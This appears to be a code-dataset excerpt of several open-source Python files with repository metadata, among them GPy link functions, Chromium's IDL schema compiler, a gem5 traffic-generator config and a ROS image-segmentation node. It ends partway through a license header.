code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
def get_type_name(type_name, sub_type=None):
""" Returns a Java type according to a spec type
"""
if type_name == "enum":
return type_name
elif type_name == "boolean":
return "Boolean"
elif type_name == "integer":
return "Long"
elif type_name == "time":
return "Float"
elif type_name == "object":
return "Object"
elif type_name == "list":
return type_name
elif type_name == "float":
return "Float"
else:
return "String"
def get_idiomatic_name(name):
"""
"""
if name == "private":
return "private_"
elif name == "public":
return "public_"
else:
return name
|
nuagenetworks/monolithe
|
monolithe/generators/lang/java/converter.py
|
Python
|
bsd-3-clause
| 2,306
|
import sys
import matplotlib.pyplot as plt
import numpy as np
import sklearn.gaussian_process
import sklearn.kernel_approximation
import splitter
from appx_gaussian_processes import appx_gp
TRAINING_NUM = 1500
TESTING_NUM = 50000
ALPHA = .003
LENGTH_SCALE = 1
GAMMA = .5 / (LENGTH_SCALE ** 2)
COMPONENTS = 100
def interval_in_box_from_line(box, line):
x_min, x_max, y_min, y_max = box
m, b = line
x_min_y = m * x_min + b
x_max_y = m * x_max + b
y_min_x = (y_min - b) / m
y_max_x = (y_max - b) / m
endpoints = set()
if y_min <= x_min_y <= y_max:
endpoints.add((x_min, x_min_y))
if y_min <= x_max_y <= y_max:
endpoints.add((x_max, x_max_y))
if x_min <= y_min_x <= x_max:
endpoints.add((y_min_x, y_min))
if x_min <= y_max_x <= x_max:
endpoints.add((y_max_x, y_max))
return endpoints
def approximate_kernel(train_X, test_X):
sampler = sklearn.kernel_approximation.RBFSampler(gamma=GAMMA, n_components=COMPONENTS)
sampler.fit(train_X)
appx_train_X = sampler.transform(train_X)
appx_test_X = sampler.transform(test_X)
return appx_train_X, appx_test_X
def main(path_in):
print('Loading data...')
data = splitter.load(path_in)
(train_X, train_y), (test_X, test_y) = splitter.split(data, TRAINING_NUM,
TESTING_NUM)
try:
gp_sigmas = np.loadtxt('gp_preds.txt')
assert gp_sigmas.shape == (TESTING_NUM,)
except (FileNotFoundError, AssertionError):
print('Fitting GP...')
kernel = sklearn.gaussian_process.kernels.RBF(
length_scale=LENGTH_SCALE)
gp = sklearn.gaussian_process.GaussianProcessRegressor(
kernel=kernel,
alpha=ALPHA,
copy_X_train=False)
gp.fit(train_X, train_y)
print('Predicting GP...')
_, gp_sigmas = gp.predict(test_X, return_std=True)
np.savetxt('gp_preds.txt', gp_sigmas)
print('Approximating kernel...')
appx_train_X, appx_test_X = approximate_kernel(train_X, test_X)
print('Fitting approximate GP...')
agp = appx_gp.AppxGaussianProcessRegressor(alpha=ALPHA)
agp.fit(appx_train_X, train_y)
print('Predicting approximate GP...')
_, agp_sigmas = agp.predict(appx_test_X, return_std=True)
print('Finding best fit...')
best_fit = np.polyfit(gp_sigmas, agp_sigmas, 1)
best_fit_box = (min(gp_sigmas), max(gp_sigmas),
min(agp_sigmas), max(agp_sigmas))
best_fit_endpoints = interval_in_box_from_line(best_fit_box, best_fit)
best_fit_xs, best_fit_ys = zip(*best_fit_endpoints)
print('Plotting...')
f = plt.figure()
ax = f.add_subplot(111)
sc = plt.scatter(gp_sigmas, agp_sigmas, s=.2, c=list(test_y))
plt.plot(best_fit_xs, best_fit_ys, color='red', label='Linear fit')
plt.title(r'$\gamma = {:.4},$ #components$= {}$'.format(GAMMA,
COMPONENTS))
plt.xlabel('GP uncertainty')
plt.ylabel('Approximate GP uncertainty')
plt.text(.975, .1, '$y = {:.4}x {:+.4}$'.format(*best_fit),
horizontalalignment='right',
verticalalignment='bottom',
transform = ax.transAxes)
colorbar = plt.colorbar(sc)
colorbar.set_label('Redshift')
plt.legend(loc='lower right')
plt.show()
if __name__ == '__main__':
main(sys.argv[1])
|
alasdairtran/mclearn
|
projects/jakub/test_appx_gp.py
|
Python
|
bsd-3-clause
| 3,431
|
#! /usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import itertools
import json
import os.path
import re
import sys
from json_parse import OrderedDict
# This file is a peer to json_schema.py. Each of these files understands a
# certain format describing APIs (either JSON or IDL), reads files written
# in that format into memory, and emits them as a Python array of objects
# corresponding to those APIs, where the objects are formatted in a way that
# the JSON schema compiler understands. compiler.py drives both idl_schema.py
# and json_schema.py.
# idl_parser expects to be able to import certain files in its directory,
# so let's set things up the way it wants.
_idl_generators_path = os.path.join(os.path.dirname(os.path.realpath(__file__)),
os.pardir, os.pardir, 'ppapi', 'generators')
if _idl_generators_path in sys.path:
import idl_parser
else:
sys.path.insert(0, _idl_generators_path)
try:
import idl_parser
finally:
sys.path.pop(0)
def ProcessComment(comment):
'''
Convert a comment into a parent comment and a list of parameter comments.
Function comments are of the form:
Function documentation. May contain HTML and multiple lines.
|arg1_name|: Description of arg1. Use <var>argument</var> to refer
to other arguments.
|arg2_name|: Description of arg2...
Newlines are removed, and leading and trailing whitespace is stripped.
Args:
comment: The string from a Comment node.
Returns: A tuple that looks like:
(
"The processed comment, minus all |parameter| mentions.",
{
'parameter_name_1': "The comment that followed |parameter_name_1|:",
...
}
)
'''
# Find all the parameter comments of the form '|name|: comment'.
parameter_starts = list(re.finditer(r' *\|([^|]*)\| *: *', comment))
# Get the parent comment (everything before the first parameter comment.
first_parameter_location = (parameter_starts[0].start()
if parameter_starts else len(comment))
parent_comment = comment[:first_parameter_location]
# We replace \n\n with <br/><br/> here and below, because the documentation
# needs to know where the newlines should be, and this is easier than
# escaping \n.
parent_comment = (parent_comment.strip().replace('\n\n', '<br/><br/>')
.replace('\n', ''))
params = OrderedDict()
for (cur_param, next_param) in itertools.izip_longest(parameter_starts,
parameter_starts[1:]):
param_name = cur_param.group(1)
# A parameter's comment goes from the end of its introduction to the
# beginning of the next parameter's introduction.
param_comment_start = cur_param.end()
param_comment_end = next_param.start() if next_param else len(comment)
params[param_name] = (comment[param_comment_start:param_comment_end
].strip().replace('\n\n', '<br/><br/>')
.replace('\n', ''))
return (parent_comment, params)
class Callspec(object):
'''
Given a Callspec node representing an IDL function declaration, converts into
a tuple:
(name, list of function parameters, return type)
'''
def __init__(self, callspec_node, comment):
self.node = callspec_node
self.comment = comment
def process(self, callbacks):
parameters = []
return_type = None
if self.node.GetProperty('TYPEREF') not in ('void', None):
return_type = Typeref(self.node.GetProperty('TYPEREF'),
self.node.parent,
{'name': self.node.GetName()}).process(callbacks)
# The IDL parser doesn't allow specifying return types as optional.
# Instead we infer any object return values to be optional.
# TODO(asargent): fix the IDL parser to support optional return types.
if return_type.get('type') == 'object' or '$ref' in return_type:
return_type['optional'] = True
for node in self.node.GetChildren():
parameter = Param(node).process(callbacks)
if parameter['name'] in self.comment:
parameter['description'] = self.comment[parameter['name']]
parameters.append(parameter)
return (self.node.GetName(), parameters, return_type)
class Param(object):
'''
Given a Param node representing a function parameter, converts into a Python
dictionary that the JSON schema compiler expects to see.
'''
def __init__(self, param_node):
self.node = param_node
def process(self, callbacks):
return Typeref(self.node.GetProperty('TYPEREF'),
self.node,
{'name': self.node.GetName()}).process(callbacks)
class Dictionary(object):
'''
Given an IDL Dictionary node, converts into a Python dictionary that the JSON
schema compiler expects to see.
'''
def __init__(self, dictionary_node):
self.node = dictionary_node
def process(self, callbacks):
properties = OrderedDict()
for node in self.node.GetChildren():
if node.cls == 'Member':
k, v = Member(node).process(callbacks)
properties[k] = v
result = {'id': self.node.GetName(),
'properties': properties,
'type': 'object'}
if self.node.GetProperty('nodoc'):
result['nodoc'] = True
elif self.node.GetProperty('inline_doc'):
result['inline_doc'] = True
elif self.node.GetProperty('noinline_doc'):
result['noinline_doc'] = True
return result
class Member(object):
'''
Given an IDL dictionary or interface member, converts into a name/value pair
where the value is a Python dictionary that the JSON schema compiler expects
to see.
'''
def __init__(self, member_node):
self.node = member_node
def process(self, callbacks):
properties = OrderedDict()
name = self.node.GetName()
if self.node.GetProperty('deprecated'):
properties['deprecated'] = self.node.GetProperty('deprecated')
for property_name in ('OPTIONAL', 'nodoc', 'nocompile', 'nodart'):
if self.node.GetProperty(property_name):
properties[property_name.lower()] = True
for option_name, sanitizer in [
('maxListeners', int),
('supportsFilters', lambda s: s == 'true'),
('supportsListeners', lambda s: s == 'true'),
('supportsRules', lambda s: s == 'true')]:
if self.node.GetProperty(option_name):
if 'options' not in properties:
properties['options'] = {}
properties['options'][option_name] = sanitizer(self.node.GetProperty(
option_name))
is_function = False
parameter_comments = OrderedDict()
for node in self.node.GetChildren():
if node.cls == 'Comment':
(parent_comment, parameter_comments) = ProcessComment(node.GetName())
properties['description'] = parent_comment
elif node.cls == 'Callspec':
is_function = True
name, parameters, return_type = (Callspec(node, parameter_comments)
.process(callbacks))
properties['parameters'] = parameters
if return_type is not None:
properties['returns'] = return_type
properties['name'] = name
if is_function:
properties['type'] = 'function'
else:
properties = Typeref(self.node.GetProperty('TYPEREF'),
self.node, properties).process(callbacks)
enum_values = self.node.GetProperty('legalValues')
if enum_values:
if properties['type'] == 'integer':
enum_values = map(int, enum_values)
elif properties['type'] == 'double':
enum_values = map(float, enum_values)
properties['enum'] = enum_values
return name, properties
class Typeref(object):
'''
Given a TYPEREF property representing the type of dictionary member or
function parameter, converts into a Python dictionary that the JSON schema
compiler expects to see.
'''
def __init__(self, typeref, parent, additional_properties):
self.typeref = typeref
self.parent = parent
self.additional_properties = additional_properties
def process(self, callbacks):
properties = self.additional_properties
result = properties
if self.parent.GetPropertyLocal('OPTIONAL'):
properties['optional'] = True
# The IDL parser denotes array types by adding a child 'Array' node onto
# the Param node in the Callspec.
for sibling in self.parent.GetChildren():
if sibling.cls == 'Array' and sibling.GetName() == self.parent.GetName():
properties['type'] = 'array'
properties['items'] = OrderedDict()
properties = properties['items']
break
if self.typeref == 'DOMString':
properties['type'] = 'string'
elif self.typeref == 'boolean':
properties['type'] = 'boolean'
elif self.typeref == 'double':
properties['type'] = 'number'
elif self.typeref == 'long':
properties['type'] = 'integer'
elif self.typeref == 'any':
properties['type'] = 'any'
elif self.typeref == 'object':
properties['type'] = 'object'
if 'additionalProperties' not in properties:
properties['additionalProperties'] = OrderedDict()
properties['additionalProperties']['type'] = 'any'
instance_of = self.parent.GetProperty('instanceOf')
if instance_of:
properties['isInstanceOf'] = instance_of
elif self.typeref == 'ArrayBuffer':
properties['type'] = 'binary'
properties['isInstanceOf'] = 'ArrayBuffer'
elif self.typeref == 'FileEntry':
properties['type'] = 'object'
properties['isInstanceOf'] = 'FileEntry'
if 'additionalProperties' not in properties:
properties['additionalProperties'] = OrderedDict()
properties['additionalProperties']['type'] = 'any'
elif self.parent.GetPropertyLocal('Union'):
choices = []
properties['choices'] = [Typeref(node.GetProperty('TYPEREF'),
node,
OrderedDict()).process(callbacks)
for node in self.parent.GetChildren()
if node.cls == 'Option']
elif self.typeref is None:
properties['type'] = 'function'
else:
if self.typeref in callbacks:
# Do not override name and description if they are already specified.
name = properties.get('name', None)
description = properties.get('description', None)
properties.update(callbacks[self.typeref])
if description is not None:
properties['description'] = description
if name is not None:
properties['name'] = name
else:
properties['$ref'] = self.typeref
return result
class Enum(object):
'''
Given an IDL Enum node, converts into a Python dictionary that the JSON
schema compiler expects to see.
'''
def __init__(self, enum_node):
self.node = enum_node
self.description = ''
def process(self, callbacks):
enum = []
for node in self.node.GetChildren():
if node.cls == 'EnumItem':
enum_value = {'name': node.GetName()}
for child in node.GetChildren():
if child.cls == 'Comment':
enum_value['description'] = ProcessComment(child.GetName())[0]
else:
raise ValueError('Did not process %s %s' % (child.cls, child))
enum.append(enum_value)
elif node.cls == 'Comment':
self.description = ProcessComment(node.GetName())[0]
else:
sys.exit('Did not process %s %s' % (node.cls, node))
result = {'id' : self.node.GetName(),
'description': self.description,
'type': 'string',
'enum': enum}
for property_name in (
'inline_doc', 'noinline_doc', 'nodoc', 'cpp_omit_enum_type',):
if self.node.GetProperty(property_name):
result[property_name] = True
if self.node.GetProperty('deprecated'):
result[deprecated] = self.node.GetProperty('deprecated')
return result
class Namespace(object):
'''
Given an IDLNode representing an IDL namespace, converts into a Python
dictionary that the JSON schema compiler expects to see.
'''
def __init__(self,
namespace_node,
description,
nodoc=False,
internal=False,
platforms=None,
compiler_options=None,
deprecated=None):
self.namespace = namespace_node
self.nodoc = nodoc
self.internal = internal
self.platforms = platforms
self.compiler_options = compiler_options
self.events = []
self.functions = []
self.types = []
self.callbacks = OrderedDict()
self.description = description
self.deprecated = deprecated
def process(self):
for node in self.namespace.GetChildren():
if node.cls == 'Dictionary':
self.types.append(Dictionary(node).process(self.callbacks))
elif node.cls == 'Callback':
k, v = Member(node).process(self.callbacks)
self.callbacks[k] = v
elif node.cls == 'Interface' and node.GetName() == 'Functions':
self.functions = self.process_interface(node)
elif node.cls == 'Interface' and node.GetName() == 'Events':
self.events = self.process_interface(node)
elif node.cls == 'Enum':
self.types.append(Enum(node).process(self.callbacks))
else:
sys.exit('Did not process %s %s' % (node.cls, node))
if self.compiler_options is not None:
compiler_options = self.compiler_options
else:
compiler_options = {}
return {'namespace': self.namespace.GetName(),
'description': self.description,
'nodoc': self.nodoc,
'types': self.types,
'functions': self.functions,
'internal': self.internal,
'events': self.events,
'platforms': self.platforms,
'compiler_options': compiler_options,
'deprecated': self.deprecated}
def process_interface(self, node):
members = []
for member in node.GetChildren():
if member.cls == 'Member':
name, properties = Member(member).process(self.callbacks)
members.append(properties)
return members
class IDLSchema(object):
'''
Given a list of IDLNodes and IDLAttributes, converts into a Python list
of api_defs that the JSON schema compiler expects to see.
'''
def __init__(self, idl):
self.idl = idl
def process(self):
namespaces = []
nodoc = False
internal = False
description = None
platforms = None
compiler_options = None
deprecated = None
for node in self.idl:
if node.cls == 'Namespace':
if not description:
# TODO(kalman): Go back to throwing an error here.
print('%s must have a namespace-level comment. This will '
'appear on the API summary page.' % node.GetName())
description = ''
namespace = Namespace(node, description, nodoc, internal,
platforms=platforms,
compiler_options=compiler_options,
deprecated=deprecated)
namespaces.append(namespace.process())
nodoc = False
internal = False
platforms = None
compiler_options = None
elif node.cls == 'Copyright':
continue
elif node.cls == 'Comment':
description = node.GetName()
elif node.cls == 'ExtAttribute':
if node.name == 'nodoc':
nodoc = bool(node.value)
elif node.name == 'internal':
internal = bool(node.value)
elif node.name == 'platforms':
platforms = list(node.value)
elif node.name == 'implemented_in':
compiler_options = {'implemented_in': node.value}
elif node.name == 'deprecated':
deprecated = str(node.value)
else:
continue
else:
sys.exit('Did not process %s %s' % (node.cls, node))
return namespaces
def Load(filename):
'''
Given the filename of an IDL file, parses it and returns an equivalent
Python dictionary in a format that the JSON schema compiler expects to see.
'''
f = open(filename, 'r')
contents = f.read()
f.close()
idl = idl_parser.IDLParser().ParseData(contents, filename)
idl_schema = IDLSchema(idl)
return idl_schema.process()
def Main():
'''
Dump a json serialization of parse result for the IDL files whose names
were passed in on the command line.
'''
for filename in sys.argv[1:]:
schema = Load(filename)
print json.dumps(schema, indent=2)
if __name__ == '__main__':
Main()
|
patrickm/chromium.src
|
tools/json_schema_compiler/idl_schema.py
|
Python
|
bsd-3-clause
| 16,913
|
#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
from chainer import cuda
import chainer.serializers as S
from chainer import Variable
from fcn.models import FCN32s
import numpy as np
import cv_bridge
import jsk_apc2016_common
from jsk_topic_tools import ConnectionBasedTransport
from jsk_topic_tools.log_utils import logwarn_throttle
from jsk_topic_tools.log_utils import jsk_logwarn
import message_filters
import rospy
from sensor_msgs.msg import Image
from skimage.color import label2rgb
from skimage.transform import resize
class FCNMaskForLabelNames(ConnectionBasedTransport):
mean_bgr = np.array((104.00698793, 116.66876762, 122.67891434))
def __init__(self):
super(self.__class__, self).__init__()
# set target_names
self.target_names = ['background'] + \
[datum['name']
for datum in jsk_apc2016_common.get_object_data()]
n_class = len(self.target_names)
assert n_class == 40
# load model
self.gpu = rospy.get_param('~gpu', 0)
chainermodel = rospy.get_param('~chainermodel')
self.model = FCN32s(n_class=n_class)
S.load_hdf5(chainermodel, self.model)
if self.gpu != -1:
self.model.to_gpu(self.gpu)
jsk_logwarn('>> Model is loaded <<')
while True:
self.tote_contents = rospy.get_param('~tote_contents', None)
if self.tote_contents is not None:
break
logwarn_throttle(10, 'param ~tote_contents is not set. Waiting..')
rospy.sleep(0.1)
self.label_names = rospy.get_param('~label_names')
jsk_logwarn('>> Param is set <<')
self.pub = self.advertise('~output', Image, queue_size=1)
self.pub_debug = self.advertise('~debug', Image, queue_size=1)
def subscribe(self):
self.sub_img = message_filters.Subscriber(
'~input', Image, queue_size=1, buff_size=2**24)
self.sub_mask = message_filters.Subscriber(
'~input/mask', Image, queue_size=1, buff_size=2**24)
sync = message_filters.ApproximateTimeSynchronizer(
[self.sub_img, self.sub_mask], queue_size=100, slop=0.1)
sync.registerCallback(self._callback)
def unsubscribe(self):
self.sub_img.unregister()
self.sub_mask.unregister()
def _callback(self, img_msg, mask_msg):
bridge = cv_bridge.CvBridge()
bgr_img = bridge.imgmsg_to_cv2(img_msg, desired_encoding='bgr8')
mask_img = bridge.imgmsg_to_cv2(mask_msg, desired_encoding='mono8')
if mask_img.size < 1:
logwarn_throttle(10, 'Too small sized image')
return
logwarn_throttle(10, '[FCNMaskForLabelNames] >> Start Processing <<')
if mask_img.ndim == 3 and mask_img.shape[2] == 1:
mask_img = mask_img.reshape(mask_img.shape[:2])
if mask_img.shape != bgr_img.shape[:2]:
jsk_logwarn('Size of mask and color image is different.'
'Resizing.. mask {0} to {1}'
.format(mask_img.shape, bgr_img.shape[:2]))
mask_img = resize(mask_img, bgr_img.shape[:2],
preserve_range=True).astype(np.uint8)
blob = bgr_img - self.mean_bgr
blob = blob.transpose((2, 0, 1))
x_data = np.array([blob], dtype=np.float32)
if self.gpu != -1:
x_data = cuda.to_gpu(x_data, device=self.gpu)
x = Variable(x_data, volatile=True)
self.model(x)
pred_datum = cuda.to_cpu(self.model.score.data[0])
candidate_labels = [self.target_names.index(name)
for name in self.tote_contents]
label_pred_in_candidates = pred_datum[candidate_labels].argmax(axis=0)
label_pred = np.zeros_like(label_pred_in_candidates)
for idx, label_val in enumerate(candidate_labels):
label_pred[label_pred_in_candidates == idx] = label_val
label_pred[mask_img == 0] = 0 # set bg_label
label_viz = label2rgb(label_pred, bgr_img, bg_label=0)
label_viz = (label_viz * 255).astype(np.uint8)
debug_msg = bridge.cv2_to_imgmsg(label_viz, encoding='rgb8')
debug_msg.header = img_msg.header
self.pub_debug.publish(debug_msg)
output_mask = np.ones(mask_img.shape, dtype=np.uint8)
output_mask *= 255
for label_val, label_name in enumerate(self.target_names):
if label_name in self.label_names:
assert label_name == 'kleenex_paper_towels'
assert label_val == 21
label_mask = ((label_pred == label_val) * 255).astype(np.uint8)
contours, hierachy = cv2.findContours(
label_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cv2.drawContours(output_mask, contours, -1, 255, -1)
# output_mask[label_pred == label_val] = False
# output_mask = output_mask.astype(np.uint8)
# output_mask[output_mask == 1] = 255
output_mask[mask_img == 0] = 0
output_mask_msg = bridge.cv2_to_imgmsg(output_mask, encoding='mono8')
output_mask_msg.header = img_msg.header
self.pub.publish(output_mask_msg)
logwarn_throttle(10, '[FCNMaskForLabelNames] >> Finshed processing <<')
if __name__ == '__main__':
rospy.init_node('fcn_mask_for_label_names')
FCNMaskForLabelNames()
rospy.spin()
|
start-jsk/jsk_apc
|
jsk_2016_01_baxter_apc/node_scripts/fcn_mask_for_label_names.py
|
Python
|
bsd-3-clause
| 5,525
|
# Copyright (c) 2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Hansson
import m5
from m5.objects import *
# both traffic generator and communication monitor are only available
# if we have protobuf support, so potentially skip this test
require_sim_object("TrafficGen")
require_sim_object("CommMonitor")
# even if this is only a traffic generator, call it cpu to make sure
# the scripts are happy
cpu = TrafficGen(config_file = "tests/quick/se/70.tgen/tgen-dram-ctrl.cfg")
# system simulated
system = System(cpu = cpu, physmem = DDR3_1600_x64(),
membus = NoncoherentBus(width = 16),
clk_domain = SrcClockDomain(clock = '1GHz',
voltage_domain =
VoltageDomain()))
# add a communication monitor
system.monitor = CommMonitor()
# connect the traffic generator to the bus via a communication monitor
system.cpu.port = system.monitor.slave
system.monitor.master = system.membus.slave
# connect the system port even if it is not used in this example
system.system_port = system.membus.slave
# connect memory to the membus
system.physmem.port = system.membus.master
# -----------------------
# run simulation
# -----------------------
root = Root(full_system = False, system = system)
root.system.mem_mode = 'timing'
|
jtyuan/racetrack
|
tests/configs/tgen-dram-ctrl.py
|
Python
|
bsd-3-clause
| 3,365
|
# Copyright (c) 2012-2015 The GPy authors (see AUTHORS.txt)
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import numpy as np
import scipy
from ..util.univariate_Gaussian import std_norm_cdf, std_norm_pdf
import scipy as sp
from ..util.misc import safe_exp, safe_square, safe_cube, safe_quad, safe_three_times
class GPTransformation(object):
"""
Link function class for doing non-Gaussian likelihoods approximation
:param Y: observed output (Nx1 numpy.darray)
.. note:: Y values allowed depend on the likelihood_function used
"""
def __init__(self):
pass
def transf(self,f):
"""
Gaussian process tranformation function, latent space -> output space
"""
raise NotImplementedError
def dtransf_df(self,f):
"""
derivative of transf(f) w.r.t. f
"""
raise NotImplementedError
def d2transf_df2(self,f):
"""
second derivative of transf(f) w.r.t. f
"""
raise NotImplementedError
def d3transf_df3(self,f):
"""
third derivative of transf(f) w.r.t. f
"""
raise NotImplementedError
def to_dict(self):
raise NotImplementedError
def _to_dict(self):
return {}
@staticmethod
def from_dict(input_dict):
import copy
input_dict = copy.deepcopy(input_dict)
link_class = input_dict.pop('class')
import GPy
link_class = eval(link_class)
return link_class._from_dict(link_class, input_dict)
@staticmethod
def _from_dict(link_class, input_dict):
return link_class(**input_dict)
class Identity(GPTransformation):
"""
.. math::
g(f) = f
"""
def transf(self,f):
return f
def dtransf_df(self,f):
return np.ones_like(f)
def d2transf_df2(self,f):
return np.zeros_like(f)
def d3transf_df3(self,f):
return np.zeros_like(f)
def to_dict(self):
input_dict = super(Identity, self)._to_dict()
input_dict["class"] = "GPy.likelihoods.link_functions.Identity"
return input_dict
class Probit(GPTransformation):
"""
.. math::
g(f) = \\Phi^{-1} (mu)
"""
def transf(self,f):
return std_norm_cdf(f)
def dtransf_df(self,f):
return std_norm_pdf(f)
def d2transf_df2(self,f):
return -f * std_norm_pdf(f)
def d3transf_df3(self,f):
return (safe_square(f)-1.)*std_norm_pdf(f)
def to_dict(self):
input_dict = super(Probit, self)._to_dict()
input_dict["class"] = "GPy.likelihoods.link_functions.Probit"
return input_dict
class Cloglog(GPTransformation):
"""
Complementary log-log link
.. math::
p(f) = 1 - e^{-e^f}
or
f = \log (-\log(1-p))
"""
def transf(self,f):
ef = safe_exp(f)
return 1-np.exp(-ef)
def dtransf_df(self,f):
ef = safe_exp(f)
return np.exp(f-ef)
def d2transf_df2(self,f):
ef = safe_exp(f)
return -np.exp(f-ef)*(ef-1.)
def d3transf_df3(self,f):
ef = safe_exp(f)
ef2 = safe_square(ef)
three_times_ef = safe_three_times(ef)
r_val = np.exp(f-ef)*(1.-three_times_ef + ef2)
return r_val
class Log(GPTransformation):
"""
.. math::
g(f) = \\log(\\mu)
"""
def transf(self,f):
return safe_exp(f)
def dtransf_df(self,f):
return safe_exp(f)
def d2transf_df2(self,f):
return safe_exp(f)
def d3transf_df3(self,f):
return safe_exp(f)
class Log_ex_1(GPTransformation):
"""
.. math::
g(f) = \\log(\\exp(\\mu) - 1)
"""
def transf(self,f):
return scipy.special.log1p(safe_exp(f))
def dtransf_df(self,f):
ef = safe_exp(f)
return ef/(1.+ef)
def d2transf_df2(self,f):
ef = safe_exp(f)
aux = ef/(1.+ef)
return aux*(1.-aux)
def d3transf_df3(self,f):
ef = safe_exp(f)
aux = ef/(1.+ef)
daux_df = aux*(1.-aux)
return daux_df - (2.*aux*daux_df)
class Reciprocal(GPTransformation):
def transf(self,f):
return 1./f
def dtransf_df(self, f):
f2 = safe_square(f)
return -1./f2
def d2transf_df2(self, f):
f3 = safe_cube(f)
return 2./f3
def d3transf_df3(self,f):
f4 = safe_quad(f)
return -6./f4
class Heaviside(GPTransformation):
"""
.. math::
g(f) = I_{x \\geq 0}
"""
def transf(self,f):
#transformation goes here
return np.where(f>0, 1, 0)
def dtransf_df(self,f):
raise NotImplementedError("This function is not differentiable!")
def d2transf_df2(self,f):
raise NotImplementedError("This function is not differentiable!")
|
befelix/GPy
|
GPy/likelihoods/link_functions.py
|
Python
|
bsd-3-clause
| 4,850
|
"""Base classes for classifiers"""
from ..core.classes import Processor
class BaseClassifier(Processor):
'''
The base class for classifiers.
'''
def __init__(self, *args, **kwargs):
super(BaseClassifier, self).__init__(*args, **kwargs)
self.classifier = None
class SklearnClassifier(BaseClassifier):
'''
A class wrapping sklearn classifiers.
'''
#The sklearn classifier
classifier_class = None
def __init__(self, *args, **kwargs):
super(BaseClassifier, self).__init__(*args, **kwargs)
self.init_classifier(*args, **kwargs)
def init_classifier(self, *args, **kwargs):
'''
Init sklearn classifier.
'''
self.classifier = self.classifier_class(*args, **kwargs)
def run_classifier(self, caller, *args, **kwargs):
pass
def run(self, caller, *args, **kwargs):
return self.run_classifier(caller, *args, **kwargs)
def __getattr__(self, attr):
'''Propagate attribute search to the clusterizer.'''
try:
return getattr(self, attr)
except:
return getattr(self.clusterizer, attr)
|
Succeed-Together/bakfu
|
classify/base.py
|
Python
|
bsd-3-clause
| 1,167
|
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of Image Engine Design nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
